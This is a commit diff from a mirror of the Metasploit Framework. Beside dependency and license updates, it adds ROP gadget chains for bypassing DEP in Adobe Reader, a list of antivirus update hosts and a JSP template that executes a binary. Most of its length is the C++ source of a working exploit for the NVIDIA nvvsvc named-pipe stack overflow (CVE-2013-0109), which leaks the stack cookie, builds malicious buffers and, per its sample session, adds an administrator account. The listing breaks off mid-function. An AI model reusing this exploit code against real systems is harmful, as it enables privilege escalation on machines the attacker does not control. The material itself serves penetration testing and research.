infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update against upstream

bug/bundler_fix
jvazquez-r7 2014-01-02 12:55:46 -06:00
parent 3bccaa407f 90158b9932
commit ec8d24c376
207 changed files with 13378 additions and 4128 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
.mailmap
View File

@ -2,6 +2,7 @@ bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
@ -13,14 +14,16 @@ jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
# Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at
@ -72,9 +75,18 @@ OJ <oj@github> OJ Reeves <oj@buffered.io>
OJ <oj@github> OJ <oj@buffered.io>
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
Rick Flores <0xnanoquetz9l@gmail.com> Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane
schierlm <schierlm@github> Michael Schierl <schierlm@gmx.de> # Aka mihi
scriptjunkie <scriptjunkie@github> Matt Weeks <scriptjunkie@scriptjunkie.us>
skape <skape@???> Matt Miller <mmiller@hick.org>
spoonm <spoonm@github> Spoon M <spoonm@gmail.com>
swtornio <swtornio@github> Steve Tornio <swtornio@gmail.com>
Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
TrustedSec <davek@trustedsec.com> trustedsec <davek@trustedsec.com>
# Aliases for utility author names. Since they're fake, typos abound
Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>

4
Gemfile
View File

@ -2,6 +2,8 @@ source 'https://rubygems.org'
# Need 3+ for ActiveSupport::Concern
gem 'activesupport', '>= 3.0.0'
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
gem 'bcrypt-ruby'
# Needed for some admin modules (scrutinizer_add_user.rb)
gem 'json'
# Needed by msfgui and other rpc components
@ -17,7 +19,7 @@ group :db do
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.6'
gem 'metasploit_data_models', '~> 0.16.9'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
end

6
Gemfile.lock
View File

@ -13,6 +13,7 @@ GEM
i18n (~> 0.6, >= 0.6.4)
multi_json (~> 1.0)
arel (3.0.2)
bcrypt-ruby (3.1.2)
builder (3.0.4)
database_cleaner (1.1.1)
diff-lcs (1.2.4)
@ -21,7 +22,7 @@ GEM
fivemat (1.2.1)
i18n (0.6.5)
json (1.8.0)
metasploit_data_models (0.16.6)
metasploit_data_models (0.16.9)
activerecord (>= 3.2.13)
activesupport
pg
@ -61,11 +62,12 @@ PLATFORMS
DEPENDENCIES
activerecord
activesupport (>= 3.0.0)
bcrypt-ruby
database_cleaner
factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json
metasploit_data_models (~> 0.16.6)
metasploit_data_models (~> 0.16.9)
msgpack
network_interface (~> 0.0.1)
nokogiri

87
LICENSE
View File

@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
2007 H D Moore <hdm [at] metasploit.com>
License: GPL-2 and Artistic
Files: external/source/meterpreter/ReflectiveDLLInjection/*
Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
Files: external/source/ReflectiveDLLInjection/*
Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
License: BSD-3-clause
Files: external/source/meterpreter/source/common/queue.h
Copyright: 1991, 1993 The Regents of the University of California
License: BSD-3-clause
Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
License: Zlib
Files: external/source/meterpreter/source/bionic/libc/*
Copyright: 2005-2008, The Android Open Source Project
2004 by Internet Systems Consortium, Inc. ("ISC")
1995,1996,1999 by Internet Software Consortium
1995 by International Business Machines, Inc.
1997,1998,1999,2004 The NetBSD Foundation, Inc.
1993 Christopher G. Demetriou
1983,1985,1989,1993 The Regents of the University of California
2000 Ben Harris
1995,1996,1997,1998 WIDE Project
2003 Networks Associates Technology, Inc.
1993 by Digital Equipment Corporation
1997 Mark Brinicombe
1993 Martin Birgmeier
1993 by Sun Microsystems, Inc.
1997, 2005 Todd C. Miller <Todd.Miller@courtesan.com>
1995, 1996 Carnegie-Mellon University
2003 Networks Associates Technology, Inc.
License: BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/bionic/libdl/*
Copyright: 2007 The Android Open Source Project
License: BSD-3-clause
Files: external/source/meterpreter/source/bionic/libm/*
Copyright: 2003, Steven G. Kargl
2003 Mike Barcroft <mike@FreeBSD.org>
2002-2005 David Schultz <das@FreeBSD.ORG>
2004 Stefan Farfeleder
2003 Dag-Erling Coïdan Smørgrav
1996 The NetBSD Foundation, Inc.
1985,1988,1991,1992,1993 The Regents of the University of California
1993,94 Winning Strategies, Inc.
1993, 2004 by Sun Microsystems, Inc.
License: BSD-2-clause and BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/extensions/espia/screen.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
Copyright: 2005 Vincent Liu
License: GPL-2
Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
Copyright: 2010, patrickHVE@googlemail.com
License: BSD-2-clause
Files: external/source/meterpreter/source/pssdk/*
Copyright: microOLAP
License: N/A
Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
SDK library embedded into the Meterpreter Sniffer extension. This
source code is not distributed with Metasploit Framework.
Files: external/source/meterpreter/source/openssl/*
Copyright: 1998-2002 The OpenSSL Project
License: OpenSSL and SSLeay
Files: external/source/meterpreter/source/server/posix/sfsyscall.h
Copyright: 2003 Philippe Biondi <biondi@cartel-securite.fr>
License: LGPL
Files: external/source/meterpreter/source/jpeg-8/*
Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
License: BSD-3-clause
Files: external/source/meterpreter/source/libpcap/*
Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
License: BSD-4-clause
Files: external/source/metsvc/*
Copyright: 2007, Determina Inc.
License: BSD-3-clause

BIN
data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll Executable file
View File

Binary file not shown.

132
data/ropdb/reader.xml Normal file
View File

@ -0,0 +1,132 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>9</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x2313d">pop ecx # ret</gadget>
<gadget offset="0x2a713">push eax # pop esp # ret</gadget>
<gadget offset="0x01f90">pop eax # ret</gadget>
<gadget offset="0x49038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x07e7d">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x0155a">pop edi # ret</gadget>
<gadget offset="0x43a84">pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x2d4de">pop ebx # ret</gadget>
<gadget offset="0x01f90">pop eax # ret</gadget>
<gadget offset="0x476aa">pop ecx # ret</gadget>
<gadget offset="0x49030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x44122">mov edx, ecx</gadget>
<gadget offset="0x476aa">pop ecx # ret</gadget>
<gadget offset="0x07e7d">call [eax] # ret</gadget>
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x43a82">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x46c5e">jmp IAT msvcr80!memcpy</gadget>
<gadget offset="0x476ab">ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x17984">xchg eax, ebp # ret</gadget>
<gadget offset="0x13178">pushad # add al, 0 # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>10</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x2e090">push eax # pop esp # ret</gadget>
<gadget offset="0x2007d">pop eax # ret</gadget>
<gadget offset="0x50038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x246d5">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x05016">pop edi # ret</gadget>
<gadget offset="0x4420c">pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x14241">pop ebx # ret</gadget>
<gadget offset="0x2007d">pop eax # ret</gadget>
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x50030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x4b49d">mov edx, ecx</gadget>
<gadget offset="0x26015">pop ecx # ret</gadget>
<gadget offset="0x246d5">call [eax] # ret</gadget>
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x14013">pop edi # pop esi # pop ebp # pop ebx # pop ecx # ret</gadget>
<gadget offset="0x4e036">jmp to IAT msvcr90!memcpy</gadget>
<gadget offset="0x2a8df">ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x18b31">xchg eax, ebp # ret</gadget>
<gadget offset="0x14197">pushad # add al, 0 # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>11</target>
</compatibility>
<gadgets base="0x4a800000">
<gadget offset="0x5822c">pop ecx # ret</gadget>
<gadget offset="0x2f129">push eax # pop esp # ret</gadget>
<gadget offset="0x5597f">pop eax # ret</gadget>
<gadget offset="0x66038">ptr to CreateFileMappingA()</gadget>
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
<gadget value="0xffffffff">HANDLE hFile</gadget>
<gadget value="0x00000000">LPSECURITY_ATTRIBUTES lpAttributes</gadget>
<gadget value="0x00000040">DWORD flProtect</gadget>
<gadget value="0x00000000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00001000">DWORD dwMaximumSizeHigh</gadget>
<gadget value="0x00000000">LPCTSTR lpName</gadget>
<gadget offset="0x55093">pop edi # ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x50030">pop ebx # pop esi # pop ebp # ret</gadget>
<gadget offset="0x5597f">pop eax # ret</gadget>
<gadget offset="0x50031">pop esi # pop ebp # ret</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x5822c">pop ecx # ret</gadget>
<gadget offset="0x3f1d5">call [eax] # ret</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x66030">ptr to MapViewOfFile()</gadget>
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
<gadget value="0x00000026">DWORD dwDesiredAccess</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetHigh</gadget>
<gadget value="0x00000000">DWORD dwFileOffsetLow</gadget>
<gadget value="0x00000000">SIZE_T dwNumberOfBytesToMap</gadget>
<gadget offset="0x14856">pop edi # pop esi # pop ebp # ret</gadget>
<gadget offset="0x505a0">memcpy address</gadget>
<gadget offset="0x60bc4">call eax # ret</gadget>
<gadget offset="0x505a0">memcpy address</gadget>
<gadget offset="0x1c376">xchg eax, ebp # ret</gadget>
<gadget offset="0x463d0">pop ebx # ret</gadget>
<gadget value="0x00000400">memcpy length</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x5d4f8">pop edx # ret</gadget>
<gadget offset="0x14864">pushad # add al, 0 # pop ebp # ret</gadget>
</gadgets>
</rop>
</db>

4
data/templates/scripts/to_exe_jsp.war.template
View File

@ -44,6 +44,8 @@
}
else
{
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
String[] %{var_exepatharray} = new String[1];
%{var_exepatharray}[0] = %{var_exepath};
Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
}
%%>

BIN
data/vncdll.dll
View File

Binary file not shown.

BIN
data/vncdll.x64.dll
View File

Binary file not shown.

BIN
data/vncdll.x86.dll Executable file
View File

Binary file not shown.

28
data/wordlists/av-update-urls.txt Normal file
View File

@ -0,0 +1,28 @@
www.es-web.sophos.com
www.es-web.sophos.com.edgesuite.net
www.es-web-2.sophos.com
www.es-web-2.sophos.com.edgesuite.net
www.dnl-01.geo.kaspersky.com
www.downloads2.kaspersky-labs.com
www.liveupdate.symantecliveupdate.com
www.liveupdate.symantec.com
www.update.symantec.com
www.update.nai.com
www.download797.avast.com
www.guru.avg.com
www.osce8-p.activeupdate.trendmicro.com
www.forefrontdl.microsoft.com
es-web.sophos.com
es-web.sophos.com.edgesuite.net
es-web-2.sophos.com
es-web-2.sophos.com.edgesuite.net
dnl-01.geo.kaspersky.com
downloads2.kaspersky-labs.com
liveupdate.symantecliveupdate.com
liveupdate.symantec.com
update.symantec.com
update.nai.com
download797.avast.com
guru.avg.com
osce8-p.activeupdate.trendmicro.com
forefrontdl.microsoft.com

3968
data/wordlists/malicious_urls.txt Normal file
View File

File diff suppressed because it is too large Load Diff

16
documentation/gendocs.sh
View File

@ -1,15 +1 @@
OPTS="-x .ut.rb -x .ts.rb -x samples -q"
BASE="$(dirname "$0")"
MSFDIR="${BASE}/.."
DOCDIR="${BASE}/api"
doc=$(which sdoc)
if [ -z $doc ]; then
doc=$(which rdoc)
fi
echo "Using ${doc} for doc generation"
echo "Putting docs in ${DOCDIR}"
$doc $OPTS -t "Metasploit Documentation" -o ${DOCDIR} ${MSFDIR}/lib/rex ${MSFDIR}/lib/msf
rake yard

3
external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj vendored
View File

@ -70,7 +70,8 @@
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>

18
external/source/exploits/cve-2013-0109/make.msbuild vendored Executable file
View File

@ -0,0 +1,18 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\nvidia_nvsvc.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86" />
<Target Name="x86">
<Message Text="Building CVE-2013-0109 NVidia nvsvc x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="NVidia nvsvc is not supported in x64" />
</Target>
</Project>

22
external/source/exploits/cve-2013-0109/nvidia_nvsvc.sln vendored Executable file
View File

@ -0,0 +1,22 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "nvidia_nvsvc", "nvidia_nvsvc\nvidia_nvsvc.vcxproj", "{6B3FF768-1F25-49C1-8827-EDEC84D4749F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.ActiveCfg = Debug|Win32
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Debug|Win32.Build.0 = Debug|Win32
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.ActiveCfg = Release|Win32
{6B3FF768-1F25-49C1-8827-EDEC84D4749F}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

33
external/source/exploits/cve-2013-0109/nvidia_nvsvc/dllmain.c vendored Executable file
View File

@ -0,0 +1,33 @@
//===============================================================================================//
// This is a stub for the actual functionality of the DLL.
//===============================================================================================//
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
#include "nvidia_nvsvc.h"
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE;
switch (dwReason)
{
case DLL_QUERY_HMODULE:
hAppInstance = hinstDLL;
if (lpReserved != NULL)
{
*(HMODULE *)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
elevate_nvidia_nvsvc(lpReserved);
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}

546
external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.cpp vendored Executable file
View File

@ -0,0 +1,546 @@
/*
NVidia Display Driver Service (Nsvr) Exploit - Christmas 2012
- Bypass DEP + ASLR + /GS + CoE
=============================================================
(@peterwintrsmith)
** Initial release 25/12/12
** Update 25/12/12 - Target for 30 Aug 2012 nvvsvc.exe Build - thanks
@seanderegge!
Hey all!
Here is an interesting exploit for a stack buffer overflow in the NVidia
Display Driver Service. The service listens on a named pipe (\pipe\nsvr)
which has a NULL DACL configured, which should mean that any logged on user
or remote user in a domain context (Windows firewall/file sharing
permitting) should be able to exploit this vulnerability.
The buffer overflow occurs as a result of a bad memmove operation, with the
stack layout effectively looking like this:
[locals]
[received-data]
[response-buf]
[stack cookie]
[return address]
[arg space]
[etc]
The memmove copies data from the received-data buffer into the response-buf
buffer, unchecked. It is possible to control the offset from which the copy
starts in the received-data buffer by embedding a variable length string -
which forms part of the protocol message being crafted - as well as the
number of bytes copied into the response buffer.
The amount of data sent back over the named pipe is related to the number
of bytes copied rather than the maximum number of bytes that the buffer is
able to safely contain, so it is possible to leak stack data by copying
from the end of the received-data buffer, through the response-buf buffer
(which is zeroed first time round, and second time round contains whatever
was in it beforehand), right to the end of the stack frame (including stack
cookie and return address).
As the entire block of data copied is sent back, the stack cookie and
nvvsvc.exe base can be determined using the aforementioned process. The
stack is then trashed, but the function servicing pipe messages won't
return until the final message has been received, so it doesn't matter too
much.
It is then possible to exploit the bug by sending two further packets of
data: One containing the leaked stack cookie and a ROP chain dynamically
generated using offsets from the leaked nvvsvc.exe base (which simply fills
the response-buf buffer when this data is echoed back) and a second packet
which contains enough data to trigger an overwrite if data is copied from
the start of the received-data buffer into the response-buf (including the
data we primed the latter to contain - stack cookie and ROP chain).
Allowing the function to then return leads to execution of our ROP chain,
and our strategically placed Metasploit net user /add shellcode! We get
continuation of execution for free because the process spins up a thread
to handle each new connection, and there are no deadlocks etc.
I've included two ROP chains, one which works against the nvvsvc.exe
running by default on my Win7/x64 Dell XPS 15/ NVidia GT540M with drivers
from the Dell site, and one which works against the latest version of the
drivers for the same card, from:
http://www.geforce.co.uk/hardware/desktop-gpus/geforce-gt-540m
http://www.geforce.co.uk/drivers/results/54709
Hope you find this interesting - it's a fun bug to play with!
- Sample Session -
C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Peter
The command completed successfully.
C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1
** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **
[@peterwintrsmith]
- Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -
Action 1 of 9: - CONNECT
Action 2 of 9: - CLIENT => SERVER
Written 16416 (0x4020) characters to pipe
Action 3 of 9: - SERVER => CLIENT
Read 16504 (0x4078) characters from pipe
Action 4 of 9: Building exploit ...
=> Stack cookie 0xe2e2893340d4:
=> nvvsvc.exe base 0x13fb90000:
Action 5 of 9: - CLIENT => SERVER
Written 16416 (0x4020) characters to pipe
Action 6 of 9: - SERVER => CLIENT
Read 16384 (0x4000) characters from pipe
Action 7 of 9: - CLIENT => SERVER
Written 16416 (0x4020) characters to pipe
Action 8 of 9: - SERVER => CLIENT
Read 16896 (0x4200) characters from pipe
Action 9 of 9: - DISCONNECT
C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Peter
r00t
The command completed successfully.
C:\Users\Peter\Desktop\NVDelMe1>
*/
#include <Windows.h>
#include <stdio.h>
extern "C" {
#include "nvidia_nvsvc.h"
}
enum EProtocolAction
{
ProtocolAction_Connect = 0,
ProtocolAction_Receive,
ProtocolAction_Send,
ProtocolAction_Disconnect,
ProtocolAction_ReadCookie,
};
typedef struct
{
EProtocolAction Action;
PBYTE Buf;
DWORD Length;
} ProtocolMessage;
const int GENERIC_BUF_LENGTH = 0x10000;
#define WriteByte(val) {buf[offs] = val; offs += 1;}
#define WriteWord(val) {*(WORD *)(buf + offs) = val; offs += 2;}
#define WriteDword(val) {*(DWORD *)(buf + offs) = val; offs += 4;}
#define WriteBytes(val, len) {memcpy(buf + offs, val, len); offs += len;}
#define BufRemaining() (sizeof(buf) - offs)
DWORD WritePipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer)
{
DWORD dwWritten = 0;
if (WriteFile(hPipe, pBuffer, cbBuffer, &dwWritten, NULL))
{
return dwWritten;
}
return 0;
}
DWORD ReadPipe(HANDLE hPipe, void *pBuffer, DWORD cbBuffer, BOOL bTimeout = FALSE)
{
DWORD dwRead = 0, dwAvailable = 0;
if (bTimeout)
{
for (DWORD i = 0; i < 30; i++)
{
if (!PeekNamedPipe(hPipe, NULL, NULL, NULL, &dwAvailable, NULL))
{
goto Cleanup;
}
if (dwAvailable)
{
break;
}
Sleep(100);
}
if (!dwAvailable)
{
goto Cleanup;
}
}
if (!ReadFile(hPipe, pBuffer, cbBuffer, &dwRead, NULL))
{
goto Cleanup;
}
Cleanup:
return dwRead;
}
HANDLE EstablishPipeConnection(char *pszPipe)
{
HANDLE hPipe = CreateFileA(
pszPipe,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hPipe == INVALID_HANDLE_VALUE)
{
return NULL;
}
return hPipe;
}
BYTE *BuildMalicious_LeakStack()
{
static BYTE buf[0x4020] = {0};
UINT offs = 0;
WriteWord(0x52);
for(UINT i=0; i<0x2000; i++)
WriteWord(0x41);
WriteWord(0);
WriteDword(0);
WriteDword(0x4078);
WriteDword(0x41414141);
WriteDword(0x41414141);
WriteDword(0x41414141);
WriteDword(0x41414141);
WriteDword(0x41414141);
return buf;
}
BYTE *BuildMalicious_FillBuf()
{
static BYTE buf[0x4020] = {0};
UINT offs = 0;
WriteWord(0x52);
WriteWord(0); // string
WriteDword(0);
WriteDword(0x4000);
while(BufRemaining())
WriteDword(0x43434343);
return buf;
}
BYTE *BuildMalicious_OverwriteStack()
{
static BYTE buf[0x4020] = { 0 };
UINT offs = 0;
WriteWord(0x52);
WriteWord(0); // string
WriteDword(0);
WriteDword(0x4340); // enough to copy shellcode too
while (BufRemaining())
{
WriteDword(0x42424242);
}
return buf;
}
/*!
* @brief Entry point for the exploit code.
* @param payload Pointer to the payload memory, which must be NULL terminated.
*/
VOID elevate_nvidia_nvsvc(LPVOID payload)
{
SIZE_T payloadLen = strlen((char*)payload) + 1;
DWORD dwReturnCode = 1, dwBytesInOut = 0;
HANDLE hPipe = NULL;
static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = { 0 };
memset(rgReadBuf, 0, sizeof(rgReadBuf));
ProtocolMessage rgConvoMsg[] =
{
{ ProtocolAction_Connect, NULL, 0 },
{ ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020 },
{ ProtocolAction_Receive, { 0 }, 0x4200 },
{ ProtocolAction_ReadCookie, { 0 }, 0 },
{ ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020 },
{ ProtocolAction_Receive, { 0 }, 0x4000 },
{ ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020 },
{ ProtocolAction_Receive, { 0 }, 0x4200 },
{ ProtocolAction_Disconnect, NULL, 0 },
};
DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0;
BOOL bTryAgain = FALSE;
char szPipe[256] = "\\\\.\\pipe\\nvsr";
// We could renable remote hosts to target other devices on network?!
// sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]);
while (i < dwNumberOfMessages)
{
printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages);
switch (rgConvoMsg[i].Action)
{
case ProtocolAction_Connect:
printf(" - CONNECT\n");
hPipe = EstablishPipeConnection(szPipe);
if (!hPipe)
{
printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError());
goto Cleanup;
}
break;
case ProtocolAction_Disconnect:
printf(" - DISCONNECT\n");
CloseHandle(hPipe);
hPipe = NULL;
break;
case ProtocolAction_Send:
printf(" - CLIENT => SERVER\n");
if (!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length)))
{
printf("!! Error writing to pipe\n");
goto Cleanup;
}
printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut);
break;
case ProtocolAction_Receive:
printf("\t - SERVER => CLIENT\n");
if (!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE)))
{
printf("!! Error reading from pipe (at least, no data on pipe)\n");
goto Cleanup;
}
printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut);
break;
case ProtocolAction_ReadCookie:
// x64 Metasploit cmd/exec:
